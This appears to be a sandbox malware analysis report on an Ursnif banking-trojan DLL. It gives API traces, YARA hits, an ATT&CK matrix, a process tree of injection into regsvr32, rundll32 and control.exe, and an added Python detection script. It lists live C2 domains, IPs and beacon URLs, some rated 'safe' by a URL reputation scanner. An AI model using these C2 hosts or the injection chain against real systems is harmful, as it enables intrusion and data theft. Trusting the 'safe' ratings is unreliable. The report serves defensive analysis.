          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013EA303 cpuid 0_2_013EA303
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0102E521 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,0_2_0102E521
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013E5C7F GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_013E5C7F
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013E4638 GetVersion,lstrcat,lstrcat,lstrcat,GetLastError,0_2_013E4638
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013EA303 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_013EA303

          Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR

          Remote Access Functionality:

Yara detected Ursnif
Source: Yara match | File source: the same 49 memory dumps and 6 process memory spaces (loaddll32.exe PID 6132, regsvr32.exe PID 7016, rundll32.exe PIDs 7056 and 7084, control.exe PIDs 5832 and 5952) listed under Stealing of Sensitive Information above.

          Mitre Att&ck Matrix

The digits in parentheses after a technique name are the hit counts the original page renders as superscripts, reproduced as extracted; techniques without a count are the matrix's unobserved entries.

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts (1) | Windows Management Instrumentation (2) | DLL Side-Loading (1) | DLL Side-Loading (1) | Obfuscated Files or Information (1) | Credential API Hooking (3) | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Native API (1) | Valid Accounts (1) | Valid Accounts (1) | DLL Side-Loading (1) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Email Collection (1) | Exfiltration Over Bluetooth | Encrypted Channel (11) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | Command and Scripting Interpreter (1) | Logon Script (Windows) | Access Token Manipulation (1) | Rootkit (4) | Security Account Manager | File and Directory Discovery (3) | SMB/Windows Admin Shares | Credential API Hooking (3) | Automated Exfiltration | Non-Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Process Injection (613) | Masquerading (1) | NTDS | System Information Discovery (25) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (13) | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Valid Accounts (1) | LSA Secrets | Query Registry (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Access Token Manipulation (1) | Cached Domain Credentials | Security Software Discovery (11) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion (31) | DCSync | Virtualization/Sandbox Evasion (31) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection (613) | Proc Filesystem | Process Discovery (3) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Regsvr32 (1) | /etc/passwd and /etc/shadow | Application Window Discovery (1) | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
| Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Rundll32 (1) | Network Sniffing | System Owner/User Discovery (1) | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact |
| Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | Remote System Discovery (1) | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop |

          Behavior Graph

Behavior Graph ID: 539453 | Sample: 61b85f75e6a7c.dll | Start date: 14/12/2021 | Architecture: WINDOWS | Score: 100

The graph's nodes and edges, as a process tree (node ids in parentheses are the graph's own numbering, not Windows PIDs; IP entries read destination:port followed by the local source ports):

Start (2)
  DNS: 8.8.8.8.in-addr.arpa, 1.0.0.127.in-addr.arpa
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Yara detected Ursnif; 10 other signatures
  +-- loaddll32.exe (9)
  |     Network: windows.update3.com, berukoneru.website, 2 other IPs or domains
  |     Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Modifies the context of a thread in another process (thread injection); 3 other signatures
  |     +-- regsvr32.exe (19)
  |     |     Network: 3.20.161.64:443 (source ports 49792, 49795), AMAZON-02, US (United States); windows.update3.com; 2 other IPs or domains
  |     |     Signatures: System process connects to network (likely due to code injection or exploit); Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures
  |     |     +-- control.exe (38)
  |     +-- rundll32.exe (23)
  |     |     Network: 18.219.227.107:443 (source ports 49790, 49793), AMAZON-02, US (United States); windows.update3.com; 2 other IPs or domains
  |     |     Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process
  |     |     +-- control.exe (41)
  |     |           Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process
  |     +-- cmd.exe (25)
  |     |     +-- rundll32.exe (43)
  |     |           Network: berukoneru.website 79.110.52.144:443 (source ports 49812, 49813), V4ESCROW-AS, RO (Romania); windows.update3.com; prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com 3.12.124.139:443 (source ports 49789, 49791), AMAZON-02, US (United States)
  |     |           Signatures: System process connects to network (likely due to code injection or exploit); Writes to foreign memory regions; Writes registry values via WMI
  |     |           +-- control.exe (59)
  |     +-- control.exe (27)
  +-- mshta.exe (13)
  |     +-- powershell.exe (29)
  |           Dropped: C:\Users\user\AppData\...\jtmpm3o0.cmdline (UTF-8)
  |           Signatures: Creates a thread in another existing process (thread injection)
  |           +-- csc.exe (46)
  |           |     Dropped: C:\Users\user\AppData\Local\...\jtmpm3o0.dll (PE32)
  |           |     +-- cvtres.exe (61)
  |           +-- 2 other processes (53)
  |                 Dropped: C:\Users\user\AppData\Local\...\gmpgobli.dll (PE32)
  +-- mshta.exe (15)
  |     +-- powershell.exe (32)
  |           +-- csc.exe (49)
  |           |     Dropped: C:\Users\user\AppData\Local\...\kon0vos3.dll (PE32)
  |           |     +-- cvtres.exe (63)
  |           +-- conhost.exe (51)
  +-- 2 other processes (17)
        +-- powershell.exe (34)
        |     +-- 2 other processes (55)
        |           Dropped: C:\Users\user\AppData\Local\...\wnczrnms.dll (PE32)
        |           +-- cvtres.exe (65)
        +-- powershell.exe (36)
              +-- 2 other processes (57)
                    Dropped: C:\Users\user\AppData\Local\...\hupbkl0t.dll (PE32)
                    +-- cvtres.exe (67)
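Two things in this report translate directly into detection logic: the execution chains in the behavior graph above (mshta.exe spawning powershell.exe, which drives csc.exe to compile from the user's AppData, and loaddll32/regsvr32/rundll32 spawning control.exe while the DLL host processes talk to the C2 hosts), and the request shape of the URLs recovered from memory in the URLs table further down. The script below is an added example written for this page; it is not Joe Sandbox code and not part of the report. The process and connection records are constructed to mirror the graph (graph node ids stand in for PIDs; the command lines and the Temp path are assumptions, since the report abbreviates the real paths), the URLs are copied from the report's URL table, and the heuristic treats the `_2B`/`_2F` tokens as Ursnif's substitutions for base64 `+` and `/`, which is an assumption rather than something the report states.

```python
"""Triage checks derived from this report's behavior graph and URL list.

Added example, not Joe Sandbox code. All events below are constructed:
graph node ids stand in for PIDs, and the command lines and the Temp path
are assumed (the report abbreviates the real paths).
"""
import ntpath
import re
from urllib.parse import urlparse

# Constructed process-creation events (Sysmon-style field names are an assumption).
PROC_EVENTS = [
    {"pid": 9,  "ppid": 2,  "image": r"C:\Windows\System32\loaddll32.exe",
     "cmd": "loaddll32.exe 61b85f75e6a7c.dll"},
    {"pid": 19, "ppid": 9,  "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmd": "regsvr32.exe /s 61b85f75e6a7c.dll"},
    {"pid": 38, "ppid": 19, "image": r"C:\Windows\System32\control.exe", "cmd": "control.exe"},
    {"pid": 25, "ppid": 9,  "image": r"C:\Windows\SysWOW64\cmd.exe", "cmd": "cmd.exe /C rundll32.exe ..."},
    {"pid": 43, "ppid": 25, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmd": "rundll32.exe 61b85f75e6a7c.dll,#1"},
    {"pid": 13, "ppid": 2,  "image": r"C:\Windows\System32\mshta.exe", "cmd": "mshta.exe ..."},
    {"pid": 29, "ppid": 13, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -EncodedCommand ..."},
    {"pid": 46, "ppid": 29, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmd": r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0.cmdline"'},
    {"pid": 61, "ppid": 46, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
     "cmd": "cvtres.exe ..."},
]
# Constructed outbound connections for graph nodes 19 and 43 (destinations from the graph).
NET_EVENTS = [
    {"pid": 19, "dst": "3.20.161.64", "dport": 443},
    {"pid": 43, "dst": "79.110.52.144", "dport": 443},
]
# URLs copied from the report's URL table, including two benign ones it also lists.
URLS = [
    "https://berukoneru.website/tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf",
    "https://windows.update3.com/tire/vuHeqIQ3bqpSw_2Byc/c_2BB_2Fi/KRLpI_2FLMzbCYIdYZV9/wMp8vpBadTBEn6lom",
    "https://windows.update3.com/",
    "http://pesterbdd.com/images/Pester.png",
    "https://contoso.com/License",
]

DLL_LOADERS = {"loaddll32.exe", "regsvr32.exe", "rundll32.exe"}
SUSPICIOUS_ANCESTORS = DLL_LOADERS | {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe"}
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\|\\Temp\\|\\ProgramData\\", re.I)
SEGMENT = re.compile(r"[A-Za-z0-9_]{1,48}")


def lineage(events, pid):
    """Lower-cased image basenames from pid up to the root: [self, parent, grandparent, ...]."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(ntpath.basename(by_pid[pid]["image"]).lower())
        pid = by_pid[pid]["ppid"]
    return chain


def check_process_events(events):
    """Chain checks for the mshta -> powershell -> csc.exe and loader -> control.exe patterns."""
    findings = []
    for e in events:
        chain = lineage(events, e["pid"])
        me, parent = chain[0], (chain[1] if len(chain) > 1 else "")
        if me == "powershell.exe" and parent == "mshta.exe":
            findings.append(("mshta_spawns_powershell", e["pid"], chain))
        if me == "csc.exe" and USER_WRITABLE.search(e["cmd"]):
            findings.append(("csc_from_user_writable_dir", e["pid"], chain))
        if me == "control.exe" and parent in DLL_LOADERS:
            findings.append(("control_exe_child_of_dll_loader", e["pid"], chain))
    return findings


def check_network_events(proc_events, net_events):
    """Outbound traffic from a DLL host (or control.exe) that a shell, script host or loader started."""
    findings = []
    for n in net_events:
        chain = lineage(proc_events, n["pid"])
        if chain and chain[0] in DLL_LOADERS | {"control.exe"} \
                and any(a in SUSPICIOUS_ANCESTORS for a in chain[1:]):
            findings.append(("network_from_injected_host_process", n["pid"], n["dst"], chain))
    return findings


def looks_like_isfb_url(url):
    """Deep path of random-looking segments carrying several _2B/_2F tokens.
    Assumption: the tokens are Ursnif's '+' and '/' substitutions in base64 request data."""
    segments = [s for s in urlparse(url).path.split("/") if s]
    if len(segments) < 4:
        return False
    *dirs, last = segments
    body = last.rsplit(".", 1)[0]  # drop the short extension (".eta" in this report)
    if not all(SEGMENT.fullmatch(s) for s in dirs + [body]):
        return False
    return len(re.findall(r"_2[BF]", "/".join(segments))) >= 2


def flag_urls(urls):
    return [u for u in urls if looks_like_isfb_url(u)]


def triage():
    """Summary of everything flagged in the constructed telemetry."""
    return {
        "process": sorted({f[0] for f in check_process_events(PROC_EVENTS)}),
        "network": [(f[1], f[2]) for f in check_network_events(PROC_EVENTS, NET_EVENTS)],
        "urls": flag_urls(URLS),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(key, value)
```

Run it as a script to print the findings; in a real pipeline the same functions take Sysmon process-creation and network-connection records (or proxy log entries) in this shape. The URL heuristic deliberately accepts the truncated fragments the sandbox recovered from memory, which lack the trailing `.eta`, since the segment structure and the `_2B`/`_2F` tokens are the stable part of the pattern.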

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

| Source | Detection | Scanner | Label |
|---|---|---|---|
| 61b85f75e6a7c.dll | 100% | Joe Sandbox ML | |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

| Source | Detection | Scanner | Label |
|---|---|---|---|
| 3.2.regsvr32.exe.49d0000.1.unpack | 100% | Avira | HEUR/AGEN.1108168 |
| 5.2.rundll32.exe.2b90000.0.unpack | 100% | Avira | HEUR/AGEN.1108168 |
| 4.2.rundll32.exe.720000.0.unpack | 100% | Avira | HEUR/AGEN.1108168 |
| 0.2.loaddll32.exe.13e0000.1.unpack | 100% | Avira | HEUR/AGEN.1108168 |

          Domains

| Source | Detection | Scanner | Label |
|---|---|---|---|
| 1.0.0.127.in-addr.arpa | 0% | Virustotal | |
| windows.update3.com | 0% | Virustotal | |
| 8.8.8.8.in-addr.arpa | 0% | Virustotal | |

          URLs

| Source | Detection | Scanner | Label |
|---|---|---|---|
| https://berukoneru.website/tire/qmvui3Jef80_2BIeM_2BXh/O_2By54KPinsD/_2BFfpah/5k89w5bXqU7DEWhQp1iBEy2/_2BnU_2FsR/sUo3C8aISdxyIYl8W/JynqV_2BmddH/AgiN2_2BUrO/VCPQbezXreMebQ/izeoYIW_2BTEh6B2Zh_2B/L3PgbMDpsuFq53n5/obVS_2BHmsXbkex/IxU7ONkaq6S5id4E4C/VTSP2pp87/7bclEnvP5UuFRz5_2FIN/q_2FKVUn/a3U.eta | 0% | Avira URL Cloud | safe |
| https://berukoneru.website/tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf | 0% | Avira URL Cloud | safe |
| http://schemas.mic | 0% | URL Reputation | safe |
| https://berukoneru.website/tire/XmFjtmy1jR6lateNyuPVYzk/zqxAUph9t_/2FhKh_2BKiBZEq6Pk/avtEml_2FYjs/Y8y781fyUpX/C_2FGsjVf_2F1i/tI0L_2Fc4mVHQ5jOtMGU8/MLBmn_2F0B4RgjE1/vjwq5A2_2B3O0OF/2xAZRByvalCt4EW7PP/8v2xGWGrY/70z8u8ipgSqR2XldqMkC/Q_2FRHW9LM53wtTl2y8/wrMCO.eta | 0% | Avira URL Cloud | safe |
| http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
| https://berukoneru.website/tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uq | 0% | Avira URL Cloud | safe |
| https://windows.update3.com/tire/vuHeqIQ3bqpSw_2Byc/c_2BB_2Fi/KRLpI_2FLMzbCYIdYZV9/wMp8vpBadTBEn6lom | 0% | Avira URL Cloud | safe |
| http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe |
| https://contoso.com/License | 0% | URL Reputation | safe |
| https://contoso.com/Icon | 0% | URL Reputation | safe |
| https://windows.update3.com/ | 0% | Avira URL Cloud | safe |
| http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe |
| https://berukoneru.website/tire/pXEvhesP8JJkQtOX4Z5G/OiJKf20ix2ZGR09v_2B/AwevbnlWqTi_2FbmjeIBIJ/B8iREIEDTHJ8C/QPwxSlTX/9Ss6_2FUQqUE8Rtt6tkm28v/8Qb_2FbAb4/RcCK4EpQ3Lh0e_2BV/nW7_2F9KVPTc/RWwFawwnn1T/NBQ509K2MeA0Zg/X_2BL3B2nl1ByESW4otQy/_2FmAs1Ly6/iqZ3GWXa.eta | 0% | Avira URL Cloud | safe |
| https://berukoneru.website/tire/k0k9N5zvmOwLqrZ9t/mA_2BT5LewRQ/XIHVxnLBVoU/TCE3xXfm5Bjx_2/FNwBkfDvRbJwwM4AJLewo/S2GmqFJJAf16v117/0Fd8Da4X45K7ewO/ZOOFQH9lFoxITYmiaW/UM4b3mHcB/fh9cKbdZnHyGiZkOZevh/xKEuDuLDKEmBX5F2T0A/HlQglDHz0FPghDE04k7Rtp/qlpZkGrY6jSqN/zGqWq5UgJ/rU.eta | 0% | Avira URL Cloud | safe |
| https://berukoneru.website/tire/jd_2FYT4kZR8w841QcBB1/tR81NFI9aRqohSRO/X0dydnORWplT5uR/5w00AG_2B_2FJ09dQQ/WUxRePiB4/GTOJFQ8FP8igXEjbgkH9/zEak3366_2FSVu5YatC/6c8yBLY3VgDZriaVuWUlRJ/NfUpYHR7DlV_2/FmC6rrvj/IWZqq_2FXZYrZ6Jfrjl4wOK/cOGNowVtID/CNlyDmEUAcdL6Nggn/Q6FP_2FvO/_2BU9JHdR/p.eta | 0% | Avira URL Cloud | safe |
| https://berukoneru.website/tire/tEXumA952Z/iljgXIorkNbq6MNPU/M3Mb2CH8XEAs/ZvNkij3gQew/dxKPUhxVjzkBtZ/B3kMEs_2FJYP69uLJ0Zru/_2BYjun6ZVTrWBF0/nSePp_2BxhkopWf/iGbA1ax9WTenbT0BwC/JetFByiwf/3LiswTAhhMHb0jpdGXHw/RYbbpWHEDIwmZCcWi7e/zfbtXmV0tr/6_2BifPd.eta | 0% | Avira URL Cloud | safe |
| https://berukoneru.website/tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf/nNbEHjkCSlyuZxandMk7W/125Nt4kKNIyzhV_2/FpQlU2nlzM_2FEI/PEryRBP68LWoGHV3sm/y9L4VUWvc/E0UlFXDmQ0_2F2mVHcN_/2B13NnOs91EWboOkL1Q/soeab74L05htIewL3_2FTu/VD2Jph.eta | 0% | Avira URL Cloud | safe |
| https://berukoneru.website/tire/yIaXbfYof9IP/8B_2BPJ4_2B/hMnTiYTFHmvWMq/Om0JbLkmD_2F5koSu_2FY/nLk_2FKibFUJ9gOk/MZT8jf1B5RdC0UZ/6Z4No8ixNFmBVmH7Bj/uDf3BhOPM/DLBe_2Bd6mkqoP7YTIID/XBuFTJLHbx1D4QjnBWn/TnGiYGHPz2eGN6knS8Er2o/_2B5QVwmx2J_2/BE8gCb3N/ingbPXC9ZN_2BMhH2cvWH8p/CYnerQtz/Ddd.eta | 0% | Avira URL Cloud | safe |
| https://berukoneru.website/tire/gzRMSfagaZDYqNWCuNWpBQY/d3QH3HcNtD/fG3zb1_2FY310Wc1Z/tU68j9ArrsrY/cG2nzLaOesJ/1fJaUxYEiS_2Fq/6VuTPCoO1fL43Db5nwE4B/eNIHObz48Uk8thb4/s2ZGHDbOs4GyVjB/HB5iQTw6wsHP9eF2fL/ehbbJ4i3G/wutxyBgCPuYINeY4btAA/_2FftqK8_2FJ53N0BbQ/E4DqjTtkOXgod/z7et.eta | 0% | Avira URL Cloud | safe |
| http://crl.microsoftq | 0% | Avira URL Cloud | safe |
| https://windows.update3.com/P | 0% | Avira URL Cloud | safe |
| https://berukoneru.website/ | 0% | Avira URL Cloud | safe |
| http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe |
| https://berukoneru.website/tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uqJTyp4A5eQ/0U2GqSt0iiLbUx/HO3viOhQ8WkG8vbfTOB_2/BnaqEkGKFXXYKGIR/Ctbh99dX8lvtuYg/YlazQ5uDO_2FKEL9Q_/2BJjb_2Fo/n4TKwNU4Z7gGvATNQb4t/rYS_2FADS/RnX9qstM/g.eta | 0% | Avira URL Cloud | safe |
          https://contoso.com/0%URL Reputationsafe
          https://berukoneru.website/tire/YD_2F3yJEGCuLOsTrEXJLr/HYLMnHFPJYjiw/7tKlG8tS/_2BbBwzFFUBrFGVOQLc5STZ/vcc52sXSbU/E9hymn9Lr8ZbD9qxB/Q3FPG7MgMTRh/kGaKVJ7xEwY/wcc7fc8ZQUc61Z/HBzqpDy8uRQEtHRcSSjiO/YH3881lPkApc1W7g/7TBJUbFugsSMYgd/TFU1BUGgDWNFTw3w_2/FKBKIQxkn/wyKgErA3/rpA.eta0%Avira URL Cloudsafe
          https://windows.update3.com/i0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | 3.12.124.139 | true | false | | high
berukoneru.website | 79.110.52.144 | true | true | | unknown
1.0.0.127.in-addr.arpa | unknown | unknown | true | | unknown
windows.update3.com | unknown | unknown | true | | unknown
8.8.8.8.in-addr.arpa | unknown | unknown | true | | unknown

              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://berukoneru.website/tire/qmvui3Jef80_2BIeM_2BXh/O_2By54KPinsD/_2BFfpah/5k89w5bXqU7DEWhQp1iBEy2/_2BnU_2FsR/sUo3C8aISdxyIYl8W/JynqV_2BmddH/AgiN2_2BUrO/VCPQbezXreMebQ/izeoYIW_2BTEh6B2Zh_2B/L3PgbMDpsuFq53n5/obVS_2BHmsXbkex/IxU7ONkaq6S5id4E4C/VTSP2pp87/7bclEnvP5UuFRz5_2FIN/q_2FKVUn/a3U.eta | true | Avira URL Cloud: safe | unknown
